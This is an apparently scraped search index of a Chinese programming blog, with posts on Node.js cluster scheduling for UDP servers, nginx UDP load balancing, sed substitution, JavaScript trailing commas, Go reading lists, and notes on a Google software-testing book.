{\u0026#34;level\u0026#34;:30,\u0026#34;time\u0026#34;:1626601202832,\u0026#34;pid\u0026#34;:98796,\u0026#34;hostname\u0026#34;:\u0026#34;wdd-2.local\u0026#34;,\u0026#34;msg\u0026#34;:\u0026#34;98796 udp server got: \\n from 127.0.0.1:53080\u0026#34;} {\u0026#34;level\u0026#34;:30,\u0026#34;time\u0026#34;:1626601203332,\u0026#34;pid\u0026#34;:98796,\u0026#34;hostname\u0026#34;:\u0026#34;wdd-2.local\u0026#34;,\u0026#34;msg\u0026#34;:\u0026#34;98796 udp server got: \\n from 127.0.0.1:53080\u0026#34;} 
{\u0026#34;level\u0026#34;:30,\u0026#34;time\u0026#34;:1626601203420,\u0026#34;pid\u0026#34;:98796,\u0026#34;hostname\u0026#34;:\u0026#34;wdd-2.local\u0026#34;,\u0026#34;msg\u0026#34;:\u0026#34;98796 udp server got: \\n from 127.0.0.1:53080\u0026#34;} {\u0026#34;level\u0026#34;:30,\u0026#34;time\u0026#34;:1626601203500,\u0026#34;pid\u0026#34;:98796,\u0026#34;hostname\u0026#34;:\u0026#34;wdd-2.local\u0026#34;,\u0026#34;msg\u0026#34;:\u0026#34;98796 udp server got: \\n from 127.0.0.1:53080\u0026#34;} {\u0026#34;level\u0026#34;:30,\u0026#34;time\u0026#34;:1626601203609,\u0026#34;pid\u0026#34;:98796,\u0026#34;hostname\u0026#34;:\u0026#34;wdd-2.local\u0026#34;,\u0026#34;msg\u0026#34;:\u0026#34;98796 udp server got: \\n from 127.0.0.1:53080\u0026#34;} {\u0026#34;level\u0026#34;:30,\u0026#34;time\u0026#34;:1626601203669,\u0026#34;pid\u0026#34;:98796,\u0026#34;hostname\u0026#34;:\u0026#34;wdd-2.local\u0026#34;,\u0026#34;msg\u0026#34;:\u0026#34;98796 udp server got: \\n from 127.0.0.1:53080\u0026#34;} {\u0026#34;level\u0026#34;:30,\u0026#34;time\u0026#34;:1626601203752,\u0026#34;pid\u0026#34;:98796,\u0026#34;hostname\u0026#34;:\u0026#34;wdd-2.local\u0026#34;,\u0026#34;msg\u0026#34;:\u0026#34;98796 udp server got: \\n from 127.0.0.1:53080\u0026#34;} {\u0026#34;level\u0026#34;:30,\u0026#34;time\u0026#34;:1626601203836,\u0026#34;pid\u0026#34;:98796,\u0026#34;hostname\u0026#34;:\u0026#34;wdd-2.local\u0026#34;,\u0026#34;msg\u0026#34;:\u0026#34;98796 udp server got: \\n from 127.0.0.1:53080\u0026#34;} {\u0026#34;level\u0026#34;:30,\u0026#34;time\u0026#34;:1626601203920,\u0026#34;pid\u0026#34;:98796,\u0026#34;hostname\u0026#34;:\u0026#34;wdd-2.local\u0026#34;,\u0026#34;msg\u0026#34;:\u0026#34;98796 udp server got: \\n from 127.0.0.1:53080\u0026#34;} {\u0026#34;level\u0026#34;:30,\u0026#34;time\u0026#34;:1626601204004,\u0026#34;pid\u0026#34;:98796,\u0026#34;hostname\u0026#34;:\u0026#34;wdd-2.local\u0026#34;,\u0026#34;msg\u0026#34;:\u0026#34;98796 udp server got: \\n from 
127.0.0.1:53080\u0026#34;} {\u0026#34;level\u0026#34;:30,\u0026#34;time\u0026#34;:1626601204089,\u0026#34;pid\u0026#34;:98796,\u0026#34;hostname\u0026#34;:\u0026#34;wdd-2.local\u0026#34;,\u0026#34;msg\u0026#34;:\u0026#34;98796 udp server got: \\n from 127.0.0.1:53080\u0026#34;} {\u0026#34;level\u0026#34;:30,\u0026#34;time\u0026#34;:1626601204172,\u0026#34;pid\u0026#34;:98796,\u0026#34;hostname\u0026#34;:\u0026#34;wdd-2.local\u0026#34;,\u0026#34;msg\u0026#34;:\u0026#34;98796 udp server got: \\n from 127.0.0.1:53080\u0026#34;} {\u0026#34;level\u0026#34;:30,\u0026#34;time\u0026#34;:1626601204256,\u0026#34;pid\u0026#34;:98796,\u0026#34;hostname\u0026#34;:\u0026#34;wdd-2.local\u0026#34;,\u0026#34;msg\u0026#34;:\u0026#34;98796 udp server got: \\n from 127.0.0.1:53080\u0026#34;} {\u0026#34;level\u0026#34;:30,\u0026#34;time\u0026#34;:1626601204340,\u0026#34;pid\u0026#34;:98796,\u0026#34;hostname\u0026#34;:\u0026#34;wdd-2.local\u0026#34;,\u0026#34;msg\u0026#34;:\u0026#34;98796 udp server got: \\n from 127.0.0.1:53080\u0026#34;} {\u0026#34;level\u0026#34;:30,\u0026#34;time\u0026#34;:1626601204423,\u0026#34;pid\u0026#34;:98796,\u0026#34;hostname\u0026#34;:\u0026#34;wdd-2.local\u0026#34;,\u0026#34;msg\u0026#34;:\u0026#34;98796 udp server got: \\n from 127.0.0.1:53080\u0026#34;} {\u0026#34;level\u0026#34;:30,\u0026#34;time\u0026#34;:1626601204507,\u0026#34;pid\u0026#34;:98796,\u0026#34;hostname\u0026#34;:\u0026#34;wdd-2.local\u0026#34;,\u0026#34;msg\u0026#34;:\u0026#34;98796 udp server got: \\n from 127.0.0.1:53080\u0026#34;} {\u0026#34;level\u0026#34;:30,\u0026#34;time\u0026#34;:1626601204590,\u0026#34;pid\u0026#34;:98798,\u0026#34;hostname\u0026#34;:\u0026#34;wdd-2.local\u0026#34;,\u0026#34;msg\u0026#34;:\u0026#34;98798 udp server got: \\n from 127.0.0.1:53080\u0026#34;} {\u0026#34;level\u0026#34;:30,\u0026#34;time\u0026#34;:1626601204674,\u0026#34;pid\u0026#34;:98796,\u0026#34;hostname\u0026#34;:\u0026#34;wdd-2.local\u0026#34;,\u0026#34;msg\u0026#34;:\u0026#34;98796 udp 
server got: \\n from 127.0.0.1:53080\u0026#34;} {\u0026#34;level\u0026#34;:30,\u0026#34;time\u0026#34;:1626601204759,\u0026#34;pid\u0026#34;:98796,\u0026#34;hostname\u0026#34;:\u0026#34;wdd-2.local\u0026#34;,\u0026#34;msg\u0026#34;:\u0026#34;98796 udp server got: \\n from 127.0.0.1:53080\u0026#34;} {\u0026#34;level\u0026#34;:30,\u0026#34;time\u0026#34;:1626601204842,\u0026#34;pid\u0026#34;:98796,\u0026#34;hostname\u0026#34;:\u0026#34;wdd-2.local\u0026#34;,\u0026#34;msg\u0026#34;:\u0026#34;98796 udp server got: \\n from 127.0.0.1:53080\u0026#34;} {\u0026#34;level\u0026#34;:30,\u0026#34;time\u0026#34;:1626601204926,\u0026#34;pid\u0026#34;:98796,\u0026#34;hostname\u0026#34;:\u0026#34;wdd-2.local\u0026#34;,\u0026#34;msg\u0026#34;:\u0026#34;98796 udp server got: \\n from 127.0.0.1:53080\u0026#34;} {\u0026#34;level\u0026#34;:30,\u0026#34;time\u0026#34;:1626601205010,\u0026#34;pid\u0026#34;:98798,\u0026#34;hostname\u0026#34;:\u0026#34;wdd-2.local\u0026#34;,\u0026#34;msg\u0026#34;:\u0026#34;98798 udp server got: \\n from 127.0.0.1:53080\u0026#34;} {\u0026#34;level\u0026#34;:30,\u0026#34;time\u0026#34;:1626601205093,\u0026#34;pid\u0026#34;:98796,\u0026#34;hostname\u0026#34;:\u0026#34;wdd-2.local\u0026#34;,\u0026#34;msg\u0026#34;:\u0026#34;98796 udp server got: \\n from 127.0.0.1:53080\u0026#34;} 为什么会这样?看看cluster模块的代码 lib/cluster.js lib/cluster.js cluster除去注释,代码仅有两行 \u0026#39;use strict\u0026#39;; // 根据环境变量中是否有NODE_UNIQUE_ID来判断当前进程是主进程还是子进程 const childOrPrimary = \u0026#39;NODE_UNIQUE_ID\u0026#39; in process.env ? 
\u0026#39;child\u0026#39; : \u0026#39;primary\u0026#39;; // 根据进程类型不同,加载的文件也不同 // 对于主进程,则加载 internal/cluster/primary // 对于子进程,则加载 internal/cluster/child module.exports = require(`internal/cluster/${childOrPrimary}`); internal/cluster/primary.js 轮询策略的种类 通过阅读源码,我们可以获取到以下结论:\ncluster模块实际上是一个事件发射器 cluster模块有两种负载均衡方式 SCHED_NONE 由操作系统决定 SCHED_RR 轮询的方式 const { ArrayPrototypePush, ArrayPrototypeSlice, ArrayPrototypeSome, ObjectKeys, ObjectValues, RegExpPrototypeTest, SafeMap, StringPrototypeStartsWith, } = primordials; const assert = require(\u0026#39;internal/assert\u0026#39;); const { fork } = require(\u0026#39;child_process\u0026#39;); const path = require(\u0026#39;path\u0026#39;); const EventEmitter = require(\u0026#39;events\u0026#39;); const RoundRobinHandle = require(\u0026#39;internal/cluster/round_robin_handle\u0026#39;); const SharedHandle = require(\u0026#39;internal/cluster/shared_handle\u0026#39;); const Worker = require(\u0026#39;internal/cluster/worker\u0026#39;); const { internal, sendHelper } = require(\u0026#39;internal/cluster/utils\u0026#39;); const cluster = new EventEmitter(); const intercom = new EventEmitter(); const SCHED_NONE = 1; const SCHED_RR = 2; const minPort = 1024; const maxPort = 65535; const { validatePort } = require(\u0026#39;internal/validators\u0026#39;); module.exports = cluster; const handles = new SafeMap(); cluster.isWorker = false; cluster.isMaster = true; // Deprecated alias. Must be same as isPrimary. cluster.isPrimary = true; cluster.Worker = Worker; cluster.workers = {}; cluster.settings = {}; cluster.SCHED_NONE = SCHED_NONE; // Leave it to the operating system. cluster.SCHED_RR = SCHED_RR; // Primary distributes connections. 轮询策略如何选择 接下来,我们就要再看看,两种不同的负载策略是如何选择的?\n负载策略刚开始来自NODE_CLUSTER_SCHED_POLICY这个环境变量 这个环境变量有两个值 rr和none 但是如果系统平台是win32, 也就是windows的情况下,则不会使用轮询的负载方式 除此以外,默认将会使用轮询的负载方式 // XXX(bnoordhuis) Fold cluster.schedulingPolicy into cluster.settings? 
let schedulingPolicy = process.env.NODE_CLUSTER_SCHED_POLICY; if (schedulingPolicy === \u0026#39;rr\u0026#39;) schedulingPolicy = SCHED_RR; else if (schedulingPolicy === \u0026#39;none\u0026#39;) schedulingPolicy = SCHED_NONE; else if (process.platform === \u0026#39;win32\u0026#39;) { // Round-robin doesn\u0026#39;t perform well on // Windows due to the way IOCP is wired up. schedulingPolicy = SCHED_NONE; } else schedulingPolicy = SCHED_RR; cluster.schedulingPolicy = schedulingPolicy; 那么,为什么udp的多进程服务器,并没有做到轮询的负载呢?\n轮询策略的使用 即使调度策略是轮询的方式,如果socket是udp的,也不会用轮询的方式去处理,而用SharedHandle去处理 注释里面写,udp使用轮询的方式是无意义的,这点我不太理解 // UDP is exempt from round-robin connection balancing for what should // be obvious reasons: it\u0026#39;s connectionless. There is nothing to send to // the workers except raw datagrams and that\u0026#39;s pointless. if (schedulingPolicy !== SCHED_RR || message.addressType === \u0026#39;udp4\u0026#39; || message.addressType === \u0026#39;udp6\u0026#39;) { handle = new SharedHandle(key, address, message); } else { handle = new RoundRobinHandle(key, address, message); } ","permalink":"https://wdd.js.org/posts/2021/07/tniabf/","summary":"本来我的目的是使用cluster模块fork出多个进程,让各个进程都能处理udp消息。但是最终测试发现,实际上仅有一个进程处理了绝大多数消息,其他的进程,要么不处理消息,要么处理非常少的消息。\n然而使用cluster来开启http服务的多进程,却能够达到多进程的负载。\nserver端demo代码: const cluster = require(\u0026#39;cluster\u0026#39;) const numCPUs = require(\u0026#39;os\u0026#39;).cpus().length const { logger } = require(\u0026#39;./logger\u0026#39;) const dgram = require(\u0026#39;dgram\u0026#39;) // const { createHTTPServer, createUDPServer } = require(\u0026#39;./app\u0026#39;) const port = 8088 if (cluster.isMaster) { for (let i = 0; i \u0026lt; numCPUs; i++) { cluster.fork() } cluster.on(\u0026#39;exit\u0026#39;, (worker, code, signal) =\u0026gt; { logger.info(`工作进程 ${worker.process.pid} 已退出`) }) } else { const server = dgram.createSocket({ type: \u0026#39;udp4\u0026#39;, reuseAddr: true }) server.","title":"udp cluster 多进程调度策略学习"},{"content":"在线书籍 
《Go语言原本》https://golang.design/under-the-hood/ 《Golang修养之路》https://www.kancloud.cn/aceld/golang 《Go语言高性能编程》https://geektutu.com/post/high-performance-go.html 《7天用Go从零实现Web框架Gee教程》https://geektutu.com/post/gee.html 博客关注 https://carlosbecker.com/ https://www.alexedwards.net/blog https://gobyexample.com/ 文章收藏 https://carlosbecker.com/posts/env-structs-golang https://www.alexedwards.net/blog/json-surprises-and-gotchas https://www.alexedwards.net/blog/how-to-manage-database-timeouts-and-cancellations-in-go https://www.alexedwards.net/blog/custom-command-line-flags https://www.alexedwards.net/blog/how-to-properly-parse-a-json-request-body https://www.alexedwards.net/blog/working-with-redis https://www.alexedwards.net/blog/organising-database-access https://www.alexedwards.net/blog/interfaces-explained ","permalink":"https://wdd.js.org/golang/learn-material/","summary":"在线书籍 《Go语言原本》https://golang.design/under-the-hood/ 《Golang修养之路》https://www.kancloud.cn/aceld/golang 《Go语言高性能编程》https://geektutu.com/post/high-performance-go.html 《7天用Go从零实现Web框架Gee教程》https://geektutu.com/post/gee.html 博客关注 https://carlosbecker.com/ https://www.alexedwards.net/blog https://gobyexample.com/ 文章收藏 https://carlosbecker.com/posts/env-structs-golang https://www.alexedwards.net/blog/json-surprises-and-gotchas https://www.alexedwards.net/blog/how-to-manage-database-timeouts-and-cancellations-in-go https://www.alexedwards.net/blog/custom-command-line-flags https://www.alexedwards.net/blog/how-to-properly-parse-a-json-request-body https://www.alexedwards.net/blog/working-with-redis https://www.alexedwards.net/blog/organising-database-access https://www.alexedwards.net/blog/interfaces-explained ","title":"Golang学习资料"},{"content":"对nginx的最低版本要求是? 1.9.13 The ngx_stream_proxy_module module (1.9.0) allows proxying data streams over TCP, UDP (1.9.13), and UNIX-domain sockets.\n简单的配置是什么样? 
例如监听本地53的udp端口,然后转发到192.168.136.130和192.168.136.131的53端口\n注意事项\nstream是顶层的配置,不能包含在http模块里面 proxy_responses很重要,如果你的udp服务只接受udp消息,并不发送udp消息,那么务必将proxy_responses的值设置为0 stream { upstream dns_upstreams { server 192.168.136.130:53; server 192.168.136.131:53; } server { listen 53 udp; proxy_pass dns_upstreams; proxy_timeout 1s; proxy_responses 0; error_log logs/dns.log; } } | Syntax: | proxy_responses number;\nDefault: — Context: stream, server |\nThis directive appeared in version 1.9.13.\nSets the number of datagrams expected from the proxied server in response to a client datagram if the UDP protocol is used. The number serves as a hint for session termination. By default, the number of datagrams is not limited. If zero value is specified, no response is expected. However, if a response is received and the session is still not finished, the response will be handled.\n我能用HAProxy吗? 答: HAProxy不支持udp Proxy,你不能用\nHAProxy is a free, very fast and reliable solution offering high availability, load balancing, and proxying for TCP and HTTP-based applications\n参考 http://nginx.org/en/docs/stream/ngx_stream_proxy_module.html#proxy_responses https://stackoverflow.com/questions/31255780/udp-traffic-with-iperf-for-haproxy ","permalink":"https://wdd.js.org/posts/2021/07/tom7mv/","summary":"对nginx的最低版本要求是? 1.9.13 The ngx_stream_proxy_module module (1.9.0) allows proxying data streams over TCP, UDP (1.9.13), and UNIX-domain sockets.\n简单的配置是什么样? 
例如监听本地53的udp端口,然后转发到192.168.136.130和192.168.136.131的53端口\n注意事项\nstream是顶层的配置,不能包含在http模块里面 proxy_responses很重要,如果你的udp服务只接受udp消息,并不发送udp消息,那么务必将proxy_responses的值设置为0 stream { upstream dns_upstreams { server 192.168.136.130:53; server 192.168.136.131:53; } server { listen 53 udp; proxy_pass dns_upstreams; proxy_timeout 1s; proxy_responses 0; error_log logs/dns.log; } } | Syntax: | proxy_responses number;\nDefault: — Context: stream, server |\nThis directive appeared in version 1.9.13.\nSets the number of datagrams expected from the proxied server in response to a client datagram if the UDP protocol is used.","title":"使用nginx为udp服务负载均衡"},{"content":"简介 看下面的代码,如果我们要新增加一行\u0026quot;ccc\u0026quot;, 实际我们的目的是增加一行,但是对于像git这种版本控制系统来说,我们改动了两行。\n第三行进行了修改 第四行增加了 我们为什么要改动两行呢?因为如果不在第三行上的末尾加上逗号就增加第四行,则会报语法错误。\nvar names = [ \u0026#34;aaa\u0026#34;, \u0026#34;bbb\u0026#34; ] var names = [ \u0026#34;aaa\u0026#34;, \u0026#34;bbb\u0026#34;, \u0026#34;ccc\u0026#34; ] 尾逗号的提案就是允许在一些场景下,允许在尾部增加逗号。\nvar name = [ \u0026#34;aaa\u0026#34;, \u0026#34;bbb\u0026#34;, ] 那么我们在新增加一行的情况下,则只需要增加一行,而不需要修改之前行的代码。\nvar name = [ \u0026#34;aaa\u0026#34;, \u0026#34;bbb\u0026#34;, \u0026#34;ccc\u0026#34;, ] 兼容性 除了IE浏览器没有对尾逗号全面支持以外,其他浏览器以及Node环境都已经完全支持 JSON是不支持尾逗号的,尾逗号只能在代码里面用 注意在包含尾逗号时数组长度的计算 [,,,].length // 3 [,,,1].length // 4 [,,,1,].length // 4 [1,,,].length // 3 使用场景 数组中使用 var abc = [ 1, 2, 3, ] 对象字面量中使用 var info = { name: \u0026#34;li\u0026#34;, age: 12, } 作为形参使用 function say ( name, age, ) { } 作为实参使用 say( \u0026#34;li\u0026#34;, 12, ) 在import中使用 import { A, B, C, } from \u0026#39;D\u0026#39; 参考 https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Trailing_commas ","permalink":"https://wdd.js.org/fe/js-trailing-commas/","summary":"简介 看下面的代码,如果我们要新增加一行\u0026quot;ccc\u0026quot;, 实际我们的目的是增加一行,但是对于像git这种版本控制系统来说,我们改动了两行。\n我们为什么要改动两行呢?因为如果不在第三行上的末尾加上逗号就增加第四行,则会报语法错误。\nvar names = [ \u0026#34;aaa\u0026#34;, \u0026#34;bbb\u0026#34; ] var names = [ \u0026#34;aaa\u0026#34;, 
\u0026#34;bbb\u0026#34;, \u0026#34;ccc\u0026#34; ] 尾逗号的提案就是允许在一些场景下,允许在尾部增加逗号。\nvar name = [ \u0026#34;aaa\u0026#34;, \u0026#34;bbb\u0026#34;, ] 那么我们在新增加一行的情况下,则只需要增加一行,而不需要修改之前行的代码。\nvar name = [ \u0026#34;aaa\u0026#34;, \u0026#34;bbb\u0026#34;, \u0026#34;ccc\u0026#34;, ] 兼容性 除了IE浏览器没有对尾逗号全面支持以外,其他浏览器以及Node环境都已经完全支持 JSON是不支持尾逗号的,尾逗号只能在代码里面用 注意在包含尾逗号时数组长度的计算 [,,,].length // 3 [,,,1].length // 4 [,,,1,].length // 4 [1,,,].length // 3 使用场景 数组中使用 var abc = [ 1, 2, 3, ] 对象字面量中使用 var info = { name: \u0026#34;li\u0026#34;, age: 12, } 作为形参使用 function say ( name, age, ) { } 作为实参使用 say( \u0026#34;li\u0026#34;, 12, ) 在import中使用 import { A, B, C, } from \u0026#39;D\u0026#39; 参考 https://developer.","title":"Js Trailing Commas"},{"content":"6月书单回顾 《鳗鱼的旅行》刚读到92% 《Googler软件测试之道》100% 《软件测试之道微软技术专家经验总结》24% 《沉默的病人》100% 《一个人的朝圣》9% 《读懂发票》100% 《108个训练让你成为手机摄影达人》100% 《经济学通识课》5% 《楚留香新传》100% 7月书单 《鳗鱼的旅行》 《软件测试之道微软技术专家经验总结》 [KU]《一个人的朝圣》 [KU]《经济学通识课》 new 水浒传 [KU] new 围城 [KU] new 黄金时代 new 长安十二时辰 [KU] new 幻夜 new 软件开发本质论 [KU] new 苏东坡传 [KU] new 诡计博物馆 [KU] new 大师的盛宴 二十世纪最佳科幻小说 [KU] new 活出生命的意义 ","permalink":"https://wdd.js.org/posts/2021/07/ou9o92/","summary":"6月书单回顾 《鳗鱼的旅行》刚读到92% 《Googler软件测试之道》100% 《软件测试之道微软技术专家经验总结》24% 《沉默的病人》100% 《一个人的朝圣》9% 《读懂发票》100% 《108个训练让你成为手机摄影达人》100% 《经济学通识课》5% 《楚留香新传》100% 7月书单 《鳗鱼的旅行》 《软件测试之道微软技术专家经验总结》 [KU]《一个人的朝圣》 [KU]《经济学通识课》 new 水浒传 [KU] new 围城 [KU] new 黄金时代 new 长安十二时辰 [KU] new 幻夜 new 软件开发本质论 [KU] new 苏东坡传 [KU] new 诡计博物馆 [KU] new 大师的盛宴 二十世纪最佳科幻小说 [KU] new 活出生命的意义 ","title":"7月书单"},{"content":"直接在原文的基础上修改 sed -i \u0026#39;s/ABC/abc/g\u0026#39; some.txt 多次替换 方案 1 使用分号 sed \u0026#39;s/ABC/abc/g;s/DEF/def/g\u0026#39; some.txt 方案 2 多次使用-e sed -e \u0026#39;s/ABC/abc/g\u0026#39; -e \u0026#39;s/DEF/def/g\u0026#39; some.txt 转义/ 如果替换或者被替换的字符中本来就有/, 那么替换就会无法达到预期效果,那么我们可以用其他的字符来替代/。\nThe / characters may be uniformly replaced by any other single character within any given s command. 
The / character (or whatever other character is used in its stead) can appear in the regexp or replacement only if it is preceded by a \\ character. https://www.gnu.org/software/sed/manual/sed.html\n# 可以用#来替代/ sed \u0026#39;s#ABC#de/#g\u0026#39; some.txt # 也可以用?来替代/ sed \u0026#39;s?ABC?de#?g\u0026#39; some.txt 替代的目标中包含变量 # 注意这里用的是双引号,内部的变量会被转义 sed \u0026#34;s#ABC#${TODAY}#g\u0026#34; some.txt 参考 https://www.gnu.org/software/sed/manual/sed.html ","permalink":"https://wdd.js.org/shell/sed-tips/","summary":"直接在原文的基础上修改 sed -i \u0026#39;s/ABC/abc/g\u0026#39; some.txt 多次替换 方案 1 使用分号 sed \u0026#39;s/ABC/abc/g;s/DEF/def/g\u0026#39; some.txt 方案 2 多次使用-e sed -e \u0026#39;s/ABC/abc/g\u0026#39; -e \u0026#39;s/DEF/def/g\u0026#39; some.txt 转义/ 如果替换或者被替换的字符中本来就有/, 那么替换就会无法达到预期效果,那么我们可以用其他的字符来替代/。\nThe / characters may be uniformly replaced by any other single character within any given s command. The / character (or whatever other character is used in its stead) can appear in the regexp or replacement only if it is preceded by a \\ character. 
https://www.gnu.org/software/sed/manual/sed.html","title":"sed替换"},{"content":"Google软件测试之道(异步图书)James Whittaker; Jason Arbon; Jeff Carollo\n序标注(黄色) - 位置 361从根本上说,如果测试人员想加入这个俱乐部,就必须具备良好的计算机科学基础和编程能力。变革标注(黄色) - 位置 367招聘具备开发能力的测试人员很难,找到懂测试的开发人员就更难,标注(黄色) - 位置 368但是维持现状更要命,我只能往前走。标注(黄色) - 位置 388我们寻找的人要兼具开发人员的技能和测试人员的思维,他们必须会编程,能实现工具、平台和测试自动化。第1章 Google软件测试介绍标注(黄色) - 1.1 质量不等于测试 \u0026gt; 位置 573Google能用如此少的专职测试人员的原因,就是开发对质量的负责。标注(黄色) - 1.1 质量不等于测试 \u0026gt; 位置 574如果某个产品出了问题,第一个跳出来的肯定是导致这个问题发生的开发人员,而不是遗漏这个 bug的测试人员。标注(黄色) - 1.2.1 软件开发工程师(SWE) \u0026gt; 位置 593软件开发工程师(标注(黄色) - 1.2.2 软件测试开发工程师(SET) \u0026gt; 位置 600软件测试开发工程师(标注(黄色) - 1.2.3 测试工程师(TE) \u0026gt; 位置 612TE把用户放在第一位来思考。 TE组织整体质量实践,分析解释测试运行结果,第2章 软件测试开发工程师书签 - 位置 784标注(黄色) - 位置 787Google的 SWE是功能开发人员; Google的 SET是测试开发人员; Google的 TE是用户开发人员。标注(黄色) - 2.1.1 开发和测试流程 \u0026gt; 位置 864测试驱动开发”标注(黄色) - 2.1.3 项目的早期阶段 \u0026gt; 位置 908一个产品如果在概念上还没有完全确定成型时就去关心质量,这就是优先级混乱的表现。标注(黄色) - 2.1.14 测试运行要求 \u0026gt; 位置 1398每个测试和其他测试之间都是独立的,使它们就能够以任意顺序来执行。标注(黄色) - 2.1.14 测试运行要求 \u0026gt; 位置 1399测试不做任何数据持久化方面的工作。标注(黄色) - 2.1.14 测试运行要求 \u0026gt; 位置 1400在这些测试用例离开测试环境的时候,要保证测试环境的状态与测试用例开始执行之前的状态是一样的。标注(黄色) - 2.1.14 测试运行要求 \u0026gt; 位置 1404总之,“任意顺序”意味着可以并发执行用例。标注(黄色) - 2.3 SET的招聘 \u0026gt; 位置 1650在一些棘手的编码问题或功能的正确性上浪费时间,不如考核他们是如何看待编码和质量的。标注(黄色) - 2.3 SET的招聘 \u0026gt; 位置 1727测试不应是被要求了才去做的事情。标注(黄色) - 2.3 SET的招聘 \u0026gt; 位置 1728程序的稳定性和韧性比功能正确要重要的多。标注(黄色) - 2.4 与工具开发工程师Ted Mao的访谈 \u0026gt; 位置 1796要允许他们使用你无法预料的方式来使用你的工具。标注(黄色) - 2.5 与Web Driver的创建者Simon Stewart的对话 \u0026gt; 位置 1845我使用了一个被称为 DDD(译注: defect-driven development)的流程,缺陷驱动开发。标注(黄色) - 2.5 与Web Driver的创建者Simon Stewart的对话 \u0026gt; 位置 1859Chrome在使用 PyAuto,第3章 测试工程师标注(黄色) - 3.1 一种面向用户的测试角色 \u0026gt; 位置 1879我们说 TE是一种“用户开发者( user-developer)”,这不是一个容易理解的概念。标注(黄色) - 3.1 一种面向用户的测试角色 \u0026gt; 位置 1880对于编码的敬意是公司文化中相当重要的一点。标注(黄色) - 3.2 测试工程师的工作 \u0026gt; 位置 1903在研发的早期阶段,功能还在不断变化,最终功能列表和范畴还没有确定, TE通常没有太多的工作可做。标注(黄色) - 3.2 测试工程师的工作 \u0026gt; 位置 1904给一个项目配备多少测试人员,取决于项目风险和投资回报率。标注(黄色) - 3.2 测试工程师的工作 
\u0026gt; 位置 1906我们需要在正确的时间,投入正确数量的 TE,并带来足够的价值。标注(黄色) - 3.2 测试工程师的工作 \u0026gt; 位置 1908当前软件的薄弱点在哪里?标注(黄色) - 3.2 测试工程师的工作 \u0026gt; 位置 1909有没有安全、隐私、性能、可靠性、可用性、标注(黄色) - 3.2 测试工程师的工作 \u0026gt; 位置 1910主要用户场景是否功能正常?标注(黄色) - 3.2 测试工程师的工作 \u0026gt; 位置 1911当发生问题的时候,是否容易诊断问题所在?标注(黄色) - 3.2 测试工程师的工作 \u0026gt; 位置 1914TE的根本使命是保护用户和业务的利益,使之不受到糟糕的设计、令人困惑的用户体验、标注(黄色) - 3.2 测试工程师的工作 \u0026gt; 位置 1921TE擅长发现需求中的模糊之处,标注(黄色) - 3.2 测试工程师的工作 \u0026gt; 位置 1924TE通常是团队里最出名的人,因为他们需要与各种角色标注(黄色) - 3.2 测试工程师的工作 \u0026gt; 位置 1938下面是我们关于 TE职责的一般性描述。测试计划和风险分析。评审需求、设计、代码和测试。探索式测试。用户场景。编写测试用例。标注(黄色) - 3.2.1 测试计划 \u0026gt; 位置 1949如果软件深受人们喜爱,大家就会认为测试所作所为是理所应当的;如果软件很糟糕,人们可能就会质疑测试工作。笔记 - 3.2.1 测试计划 \u0026gt; 位置 1950测试背锅标注(黄色) - 3.2.1 测试计划 \u0026gt; 位置 1990读者可以用“ Google Test Analytics”关键词搜索到这个工具。标注(黄色) - 3.2.1 测试计划 \u0026gt; 位置 1991避免散漫的文字,推荐使用简明的列表。标注(黄色) - 3.2.1 测试计划 \u0026gt; 位置 1993不必推销。标注(黄色) - 3.2.1 测试计划 \u0026gt; 位置 1995简洁。标注(黄色) - 3.2.1 测试计划 \u0026gt; 位置 1996不要把不重要的、无法执行的东西放进测试标注(黄色) - 3.2.1 测试计划 \u0026gt; 位置 1998渐进式的描述( Make it flow)。标注(黄色) - 3.2.1 测试计划 \u0026gt; 位置 2001最终结果应该是测试用例。标注(黄色) - 3.2.1 测试计划 \u0026gt; 位置 20091. A代表特质( Attribute)标注(黄色) - 3.2.1 测试计划 \u0026gt; 位置 2010在开始测试计划或做 ACC分析的时候,必须先确定该产品对用户、对业务的意义。我们为什么要开发这个东西呢?它能带来什么核心价值?它又靠什么来吸引用户?记住,标注(黄色) - 3.2.1 测试计划 \u0026gt; 位置 20462. C代表组件( component)组件是系统的名词,在特质被识别之后确定。标注(黄色) - 3.2.1 测试计划 \u0026gt; 位置 2049组件是构成待建系统的模块,标注(黄色) - 3.2.1 测试计划 \u0026gt; 位置 20633. 
C代表能力( capability)能力是系统的动词,代表着系统在用户指令之下完成的动作。标注(黄色) - 3.2.1 测试计划 \u0026gt; 位置 2095能力最重要的一个特点是它的可测试性。标注(黄色) - 3.2.1 测试计划 \u0026gt; 位置 2098能力最重要的一个特点是它的可测试性。标注(黄色) - 3.2.1 测试计划 \u0026gt; 位置 2100一个能力可以描述任意数量的用例。标注(黄色) - 3.2.1 测试计划 \u0026gt; 位置 2130用一系列能力来描述用户故事,标注(黄色) - 3.2.1 测试计划 \u0026gt; 位置 2142确定 Google +的特质、组件和能力。标注(黄色) - 3.2.2 风险 \u0026gt; 位置 2193风险无处不在——标注(黄色) - 3.2.2 风险 \u0026gt; 位置 2202确定风险的过程称为风险分析。标注(黄色) - 3.2.2 风险 \u0026gt; 位置 22021.风险分析标注(黄色) - 3.2.2 风险 \u0026gt; 位置 2204这些事件发生的可能性有多大?一旦发生,对公司产生多大影响?一旦发生,对客户产生多大影响?产品具备什么缓解措施?标注(黄色) - 3.2.2 风险 \u0026gt; 位置 2206这些缓解措施有多大可能会失败?处理这些失败的成本有哪些?恢复过程有多困难?事件是一次性问题,还是会再次发生?影响标注(黄色) - 3.2.2 风险 \u0026gt; 位置 2209在 Google,我们确定了两个要素:失败频率( frequency of failure)和影响( impact)。标注(黄色) - 3.2.2 风险 \u0026gt; 位置 2214风险发生频率有 4个预定义值。罕见(标注(黄色) - 3.2.2 风险 \u0026gt; 位置 2217少见( seldom):标注(黄色) - 3.2.2 风险 \u0026gt; 位置 2221偶尔( occasionally):标注(黄色) - 3.2.2 风险 \u0026gt; 位置 2225常见( often):标注(黄色) - 3.2.2 风险 \u0026gt; 位置 2229测试人员确定每个能力的故障发生频率。标注(黄色) - 3.2.2 风险 \u0026gt; 位置 2230估计风险影响的方法大致相同,也是从几种偶数取值中选标注(黄色) - 3.2.2 风险 \u0026gt; 位置 2231最小( minimal):用户甚至不会注意到的问题。标注(黄色) - 3.2.2 风险 \u0026gt; 位置 2234一些( some):可能会打扰到用户的问题。一旦发生,重试或恢复标注(黄色) - 3.2.2 风险 \u0026gt; 位置 2237较大( considerable):故障导致标注(黄色) - 3.2.2 风险 \u0026gt; 位置 2240最大( 